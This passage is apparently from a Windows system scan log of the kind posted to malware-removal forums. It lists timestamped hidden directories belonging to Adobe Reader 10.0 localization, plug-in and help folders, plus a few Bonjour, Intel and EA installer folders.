[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sv_SE
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\tr_TR
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\uk_UA
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\zh_CN
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\zh_TW
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ca_ES\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\cs_CZ\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\da_DK\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\de_DE\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\es_ES\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\eu_ES\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\fi_FI\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\fr_FR\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\hr_HR\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\hu_HU\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\it_IT\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ja_JP\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ko_KR\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\nb_NO\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\nl_NL\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\pl_PL\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\pt_BR\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ro_RO\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ru_RU\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sk_SK\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sl_SI\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sv_SE\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\tr_TR\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\uk_UA\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\zh_CN\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\zh_TW\Services
[2014/05/21 23:03:51 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\AcroForm
[2012/06/20 12:06:35 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations
[2014/05/21 23:03:52 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\AcroForm\PMP
[2012/06/20 12:06:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps
[2012/06/20 12:06:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\CAT
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\CHS
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\CHT
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\CZE
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\DAN
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\DEU
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\ENU
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\ESP
[2012/06/20 12:06:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\EUQ
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\FRA
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\HRV
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\HUN
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\ITA
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\JPN
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\KOR
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\NLD
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\NOR
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\POL
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\PTB
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\RUM
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\RUS
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\SKY
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\SLV
[2012/06/20 12:06:35 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\SUO
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\SVE
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\TUR
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\UKR
[2015/09/07 23:07:04 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_CZE
[2015/09/07 23:07:05 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_HRV
[2015/09/07 23:07:05 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_HUN
[2015/09/07 23:07:05 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_RUM
[2015/09/07 23:07:04 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_RUS
[2015/09/07 23:07:04 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_SKY
[2015/09/07 23:07:05 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_SLV
[2015/09/07 23:07:05 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_TUR
[2015/09/07 23:07:04 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_UKR
[2012/06/20 12:06:33 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins3d\prc
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\CIDFont
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\SaslPrep
[2012/06/20 12:07:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\Linguistics\LanguageNames2
[2012/06/20 12:06:41 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\TypeSupport\Unicode\Mappings
[2012/06/20 12:06:42 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\TypeSupport\Unicode\Mappings\Adobe
[2012/06/20 12:06:41 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\TypeSupport\Unicode\Mappings\Mac
[2012/06/20 12:06:41 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\TypeSupport\Unicode\Mappings\win
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\da.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\de.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\en.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\en_GB.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\es.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\fi.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\fr.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\it.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\ja.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\ko.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\nb.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\nl.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\pl.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\pt.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\pt_PT.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\ru.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\sv.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\zh_CN.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\zh_TW.lproj
[2015/02/05 17:58:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\EAInstaller
[2012/06/20 11:57:51 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Intel Corporation
[2014/04/23 18:34:35 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Resources\WebKit
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help
[2012/06/20 12:06:56 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ca_es
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\cs_cz
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\da_dk
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\de_de
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\en_us
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\es_es
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\eu_ES
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fi_fi
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fr_fr
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hr_hr
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hu_hu
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\it_it
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ja_jp
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ko_kr
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nb_no
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nl_nl
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pl_pl
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pt_br
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ro_ro
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ru_ru
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sk_sk
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sl_si
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sv_se
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\tr_tr
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\uk_ua
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_cn
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_tw
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ca_es\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ca_es\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ca_es\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\cs_cz\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\cs_cz\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\cs_cz\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\da_dk\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\da_dk\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\da_dk\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\de_de\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\de_de\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\de_de\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\en_us\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\en_us\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\en_us\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\es_es\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\es_es\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\es_es\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\eu_ES\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\eu_ES\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\eu_ES\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fi_fi\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fi_fi\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fi_fi\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fr_fr\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fr_fr\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fr_fr\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hr_hr\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hr_hr\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hr_hr\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hu_hu\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hu_hu\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hu_hu\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\it_it\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\it_it\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\it_it\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ja_jp\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ja_jp\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ja_jp\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ko_kr\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ko_kr\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ko_kr\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nb_no\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nb_no\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nb_no\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nl_nl\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nl_nl\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nl_nl\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pl_pl\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pl_pl\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pl_pl\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pt_br\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pt_br\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pt_br\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ro_ro\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ro_ro\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ro_ro\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ru_ru\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ru_ru\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ru_ru\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sk_sk\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sk_sk\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sk_sk\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sl_si\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sl_si\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sl_si\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sv_se\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sv_se\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sv_se\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\tr_tr\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\tr_tr\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\tr_tr\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\uk_ua\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\uk_ua\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\uk_ua\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_cn\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_cn\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_cn\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_tw\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_tw\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_tw\reader\X\using
[2012/06/20 12:06:56 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ca_ES
